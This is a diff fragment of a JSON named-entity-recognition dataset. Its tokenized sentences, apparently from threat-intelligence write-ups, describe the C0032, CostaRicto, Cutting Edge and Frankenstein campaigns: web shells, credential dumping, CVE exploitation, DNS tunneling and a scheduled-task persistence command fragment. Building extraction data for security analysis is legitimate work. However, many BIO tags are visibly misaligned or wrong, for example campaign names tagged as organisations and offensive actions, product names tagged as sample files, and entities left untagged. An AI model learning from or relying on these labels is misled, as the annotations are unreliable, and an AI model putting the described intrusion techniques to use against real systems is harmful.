"O" + ] + }, + { + "tokens": [ + "During", + "the", + "C0032", + "campaign,", + "TEMP.Veles", + "relied", + "on", + "encrypted", + "SSH-based", + "tunnels", + "to", + "transfer", + "tools", + "and", + "for", + "remote", + "command/program", + "execution." + ], + "ner_tags": [ + "O", + "O", + "B-Org", + "B-OffAct", + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "During", + "the", + "C0032", + "campaign,", + "TEMP.Veles", + "used", + "scheduled", + "task", + "XML", + "triggers." + ], + "ner_tags": [ + "O", + "O", + "B-Org", + "B-OffAct", + "B-Idus", + "O", + "O", + "O", + "B-Way", + "O" + ] + }, + { + "tokens": [ + "During", + "the", + "C0032", + "campaign,", + "TEMP.Veles", + "used", + "timestomping", + "to", + "modify", + "the", + "<code>$STANDARD_INFORMATION</code>", + "attribute", + "on", + "tools." + ], + "ner_tags": [ + "O", + "O", + "B-Org", + "O", + "B-Idus", + "O", + "B-Way", + "O", + "O", + "O", + "B-SamFile", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "During", + "the", + "C0032", + "campaign,", + "TEMP.Veles", + "obtained", + "and", + "used", + "tools", + "such", + "as", + "Mimikatz", + "and", + "PsExec." + ], + "ner_tags": [ + "O", + "O", + "B-Org", + "B-OffAct", + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "During", + "the", + "C0032", + "campaign,", + "TEMP.Veles", + "used", + "compromised", + "VPN", + "accounts." + ], + "ner_tags": [ + "O", + "O", + "B-Org", + "B-OffAct", + "B-Idus", + "O", + "O", + "B-Tool", + "O" + ] + }, + { + "tokens": [ + "During", + "the", + "C0032", + "campaign,", + "TEMP.Veles", + "used", + "Virtual", + "Private", + "Server", + "(VPS)", + "infrastructure." + ], + "ner_tags": [ + "O", + "O", + "B-Org", + "B-OffAct", + "B-Idus", + "O", + "I-Tool", + "I-Tool", + "I-Tool", + "B-Way", + "O" + ] + }, + { + "tokens": [ + "During", + "the", + "C0032", + "campaign,", + "TEMP.Veles", + "planted", + "Web", + "shells", + "on", + "Outlook", + "Exchange", + "servers." + ], + "ner_tags": [ + "O", + "O", + "B-Org", + "B-OffAct", + "B-Idus", + "O", + "I-Tool", + "I-Tool", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "During", + "CostaRicto,", + "the", + "threat", + "actors", + "collected", + "data", + "and", + "files", + "from", + "compromised", + "networks." + ], + "ner_tags": [ + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "For", + "CostaRicto,", + "the", + "threat", + "actors", + "established", + "domains,", + "some", + "of", + "which", + "appeared", + "to", + "spoof", + "legitimate", + "domains." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "During", + "CostaRicto,", + "the", + "threat", + "actors", + "set", + "up", + "remote", + "tunneling", + "using", + "an", + "SSH", + "tool", + "to", + "maintain", + "access", + "to", + "a", + "compromised", + "environment." + ], + "ner_tags": [ + "O", + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "B-Tool", + "O", + "I-Purp", + "I-Purp", + "I-Purp", + "I-Purp", + "I-Purp", + "O" + ] + }, + { + "tokens": [ + "During", + "CostaRicto,", + "the", + "threat", + "actors", + "downloaded", + "malware", + "and", + "tools", + "onto", + "a", + "compromised", + "host." + ], + "ner_tags": [ + "O", + "B-SamFile", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "For", + "CostaRicto,", + "the", + "threat", + "actors", + "used", + "custom", + "malware,", + "including", + "PS1,", + "CostaBricks,", + "and", + "SombRAT." + ], + "ner_tags": [ + "O", + "B-Way", + "O", + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "B-Way", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "During", + "CostaRicto,", + "the", + "threat", + "actors", + "used", + "a", + "layer", + "of", + "proxies", + "to", + "manage", + "C2", + "communications." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "During", + "CostaRicto,", + "the", + "threat", + "actors", + "employed", + "nmap", + "and", + "pscan", + "to", + "scan", + "target", + "environments." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "B-Way", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "During", + "CostaRicto,", + "the", + "threat", + "actors", + "set", + "up", + "remote", + "SSH", + "tunneling", + "into", + "the", + "victim's", + "environment", + "from", + "a", + "malicious", + "domain." + ], + "ner_tags": [ + "O", + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "During", + "CostaRicto,", + "the", + "threat", + "actors", + "used", + "scheduled", + "tasks", + "to", + "download", + "backdoor", + "tools." + ], + "ner_tags": [ + "O", + "B-Way", + "O", + "I-HackOrg", + "I-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "During", + "CostaRicto,", + "the", + "threat", + "actors", + "obtained", + "open", + "source", + "tools", + "to", + "use", + "in", + "their", + "operations." + ], + "ner_tags": [ + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "During", + "Cutting", + "Edge,", + "threat", + "actors", + "saved", + "collected", + "data", + "to", + "a", + "tar", + "archive." + ], + "ner_tags": [ + "O", + "B-Org", + "B-OffAct", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "During", + "Cutting", + "Edge,", + "threat", + "actors", + "used", + "Perl", + "scripts", + "to", + "enable", + "the", + "deployment", + "of", + "the", + "THINSPOOL", + "shell", + "script", + "dropper", + "and", + "for", + "enumerating", + "host", + "data." + ], + "ner_tags": [ + "O", + "B-Idus", + "B-HackOrg", + "O", + "O", + "O", + "B-Way", + "B-Tool", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "I-Tool", + "I-Tool", + "I-Tool", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "During", + "Cutting", + "Edge,", + "threat", + "actors", + "trojanized", + "legitimate", + "files", + "in", + "Ivanti", + "Connect", + "Secure", + "appliances", + "with", + "malicious", + "code." + ], + "ner_tags": [ + "O", + "O", + "O", + "I-HackOrg", + "I-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "During", + "Cutting", + "Edge,", + "threat", + "actors", + "used", + "DNS", + "to", + "tunnel", + "IPv4", + "C2", + "traffic." + ], + "ner_tags": [ + "O", + "B-Org", + "B-OffAct", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "During", + "Cutting", + "Edge,", + "threat", + "actors", + "stole", + "the", + "running", + "configuration", + "and", + "cache", + "data", + "from", + "targeted", + "Ivanti", + "Connect", + "Secure", + "VPNs." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "I-Tool", + "O" + ] + }, + { + "tokens": [ + "During", + "Cutting", + "Edge,", + "threat", + "actors", + "disabled", + "logging", + "and", + "modified", + "the", + "`compcheckresult.cgi`", + "component", + "to", + "edit", + "the", + "Ivanti", + "Connect", + "Secure", + "built-in", + "Integrity", + "Checker", + "exclusion", + "list", + "to", + "evade", + "detection." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "During", + "Cutting", + "Edge,", + "threat", + "actors", + "used", + "compromised", + "VPN", + "accounts", + "for", + "lateral", + "movement", + "on", + "targeted", + "networks." + ], + "ner_tags": [ + "O", + "B-Org", + "B-OffAct", + "I-HackOrg", + "I-HackOrg", + "O", + "I-Tool", + "B-Way", + "B-Tool", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "During", + "Cutting", + "Edge,", + "threat", + "actors", + "used", + "a", + "Base64-encoded", + "Python", + "script", + "to", + "write", + "a", + "patched", + "version", + "of", + "the", + "Ivanti", + "Connect", + "Secure", + "`dsls`", + "binary." + ], + "ner_tags": [ + "O", + "B-Org", + "B-OffAct", + "O", + "O", + "O", + "O", + "O", + "I-Tool", + "I-Tool", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "During", + "Cutting", + "Edge,", + "threat", + "actors", + "exploited", + "CVE-2023-46805", + "and", + "CVE-2024-21887", + "in", + "Ivanti", + "Connect", + "Secure", + "VPN", + "appliances", + "to", + "enable", + "authentication", + "bypass", + "and", + "command", + "injection.", + "A", + "server-side", + "request", + "forgery", + "(SSRF)", + "vulnerability,", + "CVE-2024-21893,", + "was", + "identified", + "later", + "and", + "used", + "to", + "bypass", + "mitigations", + "for", + "the", + "initial", + "two", + "vulnerabilities", + "by", + "chaining", + "with", + "CVE-2024-21887." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "B-Features", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Features" + ] + }, + { + "tokens": [ + "During", + "Cutting", + "Edge,", + "threat", + "actors", + "deleted", + "`/tmp/test1.txt`", + "on", + "compromised", + "Ivanti", + "Connect", + "Secure", + "VPNs", + "which", + "was", + "used", + "to", + "hold", + "stolen", + "configuration", + "and", + "cache", + "files." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "I-Features", + "I-Features", + "I-Features", + "O", + "I-Features", + "O" + ] + }, + { + "tokens": [ + "During", + "Cutting", + "Edge,", + "threat", + "actors", + "cleared", + "logs", + "to", + "remove", + "traces", + "of", + "their", + "activity", + "and", + "restored", + "compromised", + "systems", + "to", + "a", + "clean", + "state", + "to", + "bypass", + "manufacturer", + "mitigations", + "for", + "CVE-2023-46805", + "and", + "CVE-2024-21887." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Features", + "O", + "B-Features" + ] + }, + { + "tokens": [ + "During", + "Cutting", + "Edge,", + "threat", + "actors", + "leveraged", + "exploits", + "to", + "download", + "remote", + "files", + "to", + "Ivanti", + "Connect", + "Secure", + "VPNs." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "During", + "Cutting", + "Edge,", + "threat", + "actors", + "modified", + "a", + "JavaScript", + "file", + "on", + "the", + "Web", + "SSL", + "VPN", + "component", + "of", + "Ivanti", + "Connect", + "Secure", + "devices", + "to", + "keylog", + "credentials." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "I-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "During", + "Cutting", + "Edge,", + "threat", + "actors", + "used", + "Task", + "Manager", + "to", + "dump", + "LSASS", + "memory", + "from", + "Windows", + "devices", + "to", + "disk." + ], + "ner_tags": [ + "O", + "B-Org", + "B-OffAct", + "O", + "O", + "O", + "I-Tool", + "I-Tool", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "During", + "Cutting", + "Edge,", + "threat", + "actors", + "accessed", + "and", + "mounted", + "virtual", + "hard", + "disk", + "backups", + "to", + "extract", + "ntds.dit." + ], + "ner_tags": [ + "O", + "O", + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile" + ] + }, + { + "tokens": [ + "During", + "Cutting", + "Edge,", + "threat", + "actors", + "used", + "compromised", + "and", + "out-of-support", + "Cyberoam", + "VPN", + "appliances", + "for", + "C2." + ], + "ner_tags": [ + "O", + "B-Org", + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "I-Tool", + "I-Tool", + "O", + "O" + ] + }, + { + "tokens": [ + "During", + "Cutting", + "Edge,", + "threat", + "actors", + "used", + "the", + "Unix", + "socket", + "and", + "a", + "reverse", + "TCP", + "shell", + "for", + "C2", + "communications." + ], + "ner_tags": [ + "O", + "B-Org", + "B-OffAct", + "O", + "O", + "O", + "O", + "I-Tool", + "I-Tool", + "O", + "O", + "I-Tool", + "I-Tool", + "I-Tool", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "During", + "Cutting", + "Edge,", + "threat", + "actors", + "used", + "malicious", + "SparkGateway", + "plugins", + "to", + "inject", + "shared", + "objects", + "into", + "web", + "process", + "memory", + "on", + "compromised", + "Ivanti", + "Secure", + "Connect", + "VPNs", + "to", + "enable", + "deployment", + "of", + "backdoors." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "B-Tool", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "During", + "Cutting", + "Edge,", + "threat", + "actors", + "used", + "Iodine", + "to", + "tunnel", + "IPv4", + "traffic", + "over", + "DNS." + ], + "ner_tags": [ + "O", + "B-Org", + "B-OffAct", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "During", + "Cutting", + "Edge,", + "threat", + "actors", + "used", + "a", + "Python", + "reverse", + "shell", + "and", + "the", + "PySoxy", + "SOCKS5", + "proxy", + "tool." + ], + "ner_tags": [ + "O", + "B-Org", + "B-OffAct", + "O", + "O", + "O", + "O", + "I-Tool", + "I-Tool", + "I-Tool", + "O", + "O", + "B-Way", + "I-Tool", + "I-Tool", + "O" + ] + }, + { + "tokens": [ + "During", + "Cutting", + "Edge,", + "threat", + "actors", + "used", + "RDP", + "with", + "compromised", + "credentials", + "for", + "lateral", + "movement." + ], + "ner_tags": [ + "O", + "B-Org", + "B-HackOrg", + "I-HackOrg", + "I-HackOrg", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "During", + "Cutting", + "Edge,", + "threat", + "actors", + "moved", + "laterally", + "using", + "compromised", + "credentials", + "to", + "connect", + "to", + "internal", + "Windows", + "systems", + "with", + "SMB." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "During", + "Cutting", + "Edge,", + "threat", + "actors", + "used", + "SSH", + "for", + "lateral", + "movement." + ], + "ner_tags": [ + "O", + "B-Org", + "B-OffAct", + "I-HackOrg", + "I-HackOrg", + "O", + "B-Way", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "During", + "Cutting", + "Edge,", + "threat", + "actors", + "peformed", + "reconnaissance", + "of", + "victims'", + "internal", + "websites", + "via", + "proxied", + "connections." + ], + "ner_tags": [ + "O", + "O", + "O", + "I-HackOrg", + "I-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "During", + "Cutting", + "Edge,", + "threat", + "actors", + "used", + "the", + "ENUM4LINUX", + "Perl", + "script", + "for", + "discovery", + "on", + "Windows", + "and", + "Samba", + "hosts." + ], + "ner_tags": [ + "O", + "B-Org", + "B-OffAct", + "O", + "O", + "O", + "O", + "B-Way", + "I-Tool", + "I-Tool", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "During", + "Cutting", + "Edge,", + "threat", + "actors", + "changed", + "timestamps", + "of", + "multiple", + "files", + "on", + "compromised", + "Ivanti", + "Secure", + "Connect", + "VPNs", + "to", + "conceal", + "malicious", + "activity." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Tool", + "B-Way", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "During", + "Cutting", + "Edge,", + "threat", + "actors", + "leveraged", + "tools", + "including", + "Interactsh", + "to", + "identify", + "vulnerable", + "targets,", + "PySoxy", + "to", + "simultaneously", + "dispatch", + "traffic", + "between", + "multiple", + "endpoints,", + "BusyBox", + "to", + "enable", + "post", + "exploitation", + "activities,", + "and", + "Kubo", + "Injector", + "to", + "inject", + "shared", + "objects", + "into", + "process", + "memory." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "B-Purp", + "B-Features", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "I-OffAct", + "I-OffAct", + "O", + "O", + "B-Way", + "B-Tool", + "O", + "B-Features", + "I-Features", + "I-Features", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "During", + "Cutting", + "Edge,", + "threat", + "actors", + "sent", + "a", + "magic", + "48-byte", + "sequence", + "to", + "enable", + "the", + "PITSOCK", + "backdoor", + "to", + "communicate", + "via", + "the", + "`/tmp/clientsDownload.sock`", + "socket." + ], + "ner_tags": [ + "O", + "O", + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "B-Way", + "B-Tool", + "O", + "O", + "O", + "O", + "B-SamFile", + "O" + ] + }, + { + "tokens": [ + "During", + "Cutting", + "Edge,", + "threat", + "actors", + "used", + "the", + "publicly", + "available", + "Interactsh", + "tool", + "to", + "identify", + "Ivanti", + "Connect", + "Secure", + "VPNs", + "vulnerable", + "to", + "CVE-2024-21893." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "B-Features" + ] + }, + { + "tokens": [ + "During", + "Cutting", + "Edge,", + "threat", + "actors", + "modified", + "the", + "JavaScript", + "loaded", + "by", + "the", + "Ivanti", + "Connect", + "Secure", + "login", + "page", + "to", + "capture", + "credentials", + "entered." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "During", + "Cutting", + "Edge,", + "threat", + "actors", + "used", + "multiple", + "web", + "shells", + "to", + "maintain", + "presence", + "on", + "compromised", + "Connect", + "Secure", + "appliances", + "such", + "as", + "WIREFIRE,", + "GLASSTOKEN,", + "BUSHWALK,", + "LIGHTWIRE,", + "and", + "FRAMESTING." + ], + "ner_tags": [ + "O", + "B-Org", + "B-HackOrg", + "O", + "O", + "O", + "O", + "I-Tool", + "I-Tool", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "B-Way", + "B-Way", + "B-Way", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "During", + "Frankenstein,", + "the", + "threat", + "actors", + "used", + "Empire", + "to", + "automatically", + "gather", + "the", + "username,", + "domain", + "name,", + "machine", + "name,", + "and", + "other", + "system", + "information." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "I-Purp", + "I-Purp", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "During", + "Frankenstein,", + "the", + "threat", + "actors", + "collected", + "information", + "via", + "Empire,", + "which", + "was", + "automatically", + "sent", + "back", + "to", + "the", + "adversary's", + "C2." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Tool", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "During", + "Frankenstein,", + "the", + "threat", + "actors", + "ran", + "encoded", + "commands", + "from", + "the", + "command", + "line." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "During", + "Frankenstein,", + "the", + "threat", + "actors", + "used", + "Empire", + "to", + "gather", + "various", + "local", + "system", + "information." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "I-Purp", + "I-Purp", + "I-Purp", + "B-Features", + "B-Purp" + ] + }, + { + "tokens": [ + "During", + "Frankenstein,", + "the", + "threat", + "actors", + "deobfuscated", + "Base64-encoded", + "commands", + "following", + "the", + "execution", + "of", + "a", + "malicious", + "script,", + "which", + "revealed", + "a", + "small", + "script", + "designed", + "to", + "obtain", + "an", + "additional", + "payload." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "During", + "Frankenstein,", + "the", + "threat", + "actors", + "collected", + "information", + "via", + "Empire,", + "which", + "sent", + "the", + "data", + "back", + "to", + "the", + "adversary's", + "C2." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Tool", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "During", + "Frankenstein,", + "the", + "threat", + "actors", + "exploited", + "CVE-2017-11882", + "to", + "execute", + "code", + "on", + "the", + "victim's", + "machine." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "During", + "Frankenstein,", + "the", + "threat", + "actors", + "downloaded", + "files", + "and", + "tools", + "onto", + "a", + "victim", + "machine." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "B-Purp", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "During", + "Frankenstein,", + "the", + "threat", + "actors", + "used", + "MSbuild", + "to", + "execute", + "an", + "actor-created", + "file." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "During", + "Frankenstein,", + "the", + "threat", + "actors", + "relied", + "on", + "a", + "victim", + "to", + "enable", + "macros", + "within", + "a", + "malicious", + "Microsoft", + "Word", + "document", + "likely", + "sent", + "via", + "email." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "I-SamFile", + "I-SamFile", + "I-SamFile", + "O", + "O", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "During", + "Frankenstein,", + "the", + "threat", + "actors", + "named", + "a", + "malicious", + "scheduled", + "task", + "\"WinUpdate\"", + "for", + "persistence." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O" + ] + }, + { + "tokens": [ + "During", + "Frankenstein,", + "the", + "threat", + "actors", + "used", + "PowerShell", + "to", + "run", + "a", + "series", + "of", + "Base64-encoded", + "commands", + "that", + "acted", + "as", + "a", + "stager", + "and", + "enumerated", + "hosts." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "During", + "Frankenstein,", + "the", + "threat", + "actors", + "used", + "Empire", + "to", + "obtain", + "a", + "list", + "of", + "all", + "running", + "processes." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "During", + "Frankenstein,", + "the", + "threat", + "actors", + "established", + "persistence", + "through", + "a", + "scheduled", + "task", + "using", + "the", + "command:", + "`/Create", + "/F", + "/SC", + "DAILY", + "/ST", + "09:00", + "/TN", + "WinUpdate", + "/TR`,", + "named", + "\"WinUpdate\"" + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "B-SamFile", + "B-SamFile", + "O", + "O", + "O", + "O", + "B-SamFile", + "B-SamFile", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "During", + "Frankenstein,", + "the", + "threat", + "actors", + "used", + "WMI", + "queries", + "to", + "determine", + "if", + "analysis", + "tools", + "were", + "running", + "on", + "a", + "compromised", + "system." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "During", + "Frankenstein,", + "the", + "threat", + "actors", + "likely", + "used", + "spearphishing", + "emails", + "to", + "send", + "malicious", + "Microsoft", + "Word", + "documents." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "I-Way", + "O", + "O", + "B-SamFile", + "I-SamFile", + "I-SamFile", + "O" + ] + }, + { + "tokens": [ + "During", + "Frankenstein,", + "the", + "threat", + "actors", + "communicated", + "with", + "C2", + "via", + "an", + "encrypted", + "RC4", + "byte", + "stream", + "and", + "AES-CBC." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "During", + "Frankenstein,", + "the", + "threat", + "actors", + "used", + "a", + "script", + "that", + "ran", + "WMI", + "queries", + "to", + "check", + "if", + "a", + "VM", + "or", + "sandbox", + "was", + "running,", + "including", + "VMWare", + "and", + "Virtualbox.", + "The", + "script", + "would", + "also", + "call", + "WMI", + "to", + "determine", + "the", + "number", + "of", + "cores", + "allocated", + "to", + "the", + "system;", + "if", + "less", + "than", + "two", + "the", + "script", + "would", + "stop", + "execution." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "During", + "Frankenstein,", + "the", + "threat", + "actors", + "used", + "Empire", + "to", + "obtain", + "the", + "compromised", + "machine's", + "name." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "During", + "Frankenstein,", + "the", + "threat", + "actors", + "used", + "Empire", + "to", + "find", + "the", + "public", + "IP", + "address", + "of", + "a", + "compromised", + "system." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "I-Purp", + "I-Purp", + "I-Purp", + "I-Purp", + "I-Purp", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "During", + "Frankenstein,", + "the", + "threat", + "actors", + "used", + "Empire", + "to", + "enumerate", + "hosts", + "and", + "gather", + "username,", + "machine", + "name,", + "and", + "administrative", + "permissions", + "information." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "During", + "Frankenstein,", + "the", + "threat", + "actors", + "used", + "trojanized", + "documents", + "that", + "retrieved", + "remote", + "templates", + "from", + "an", + "adversary-controlled", + "website." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "B-Tool", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "For", + "Frankenstein,", + "the", + "threat", + "actors", + "obtained", + "and", + "used", + "Empire." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Tool" + ] + }, + { + "tokens": [ + "During", + "Frankenstein,", + "the", + "threat", + "actors", + "used", + "Word", + "documents", + "that", + "prompted", + "the", + "victim", + "to", + "enable", + "macros", + "and", + "run", + "a", + "Visual", + "Basic", + "script." + ], + "ner_tags": [ + "O", + "O", + "O", + 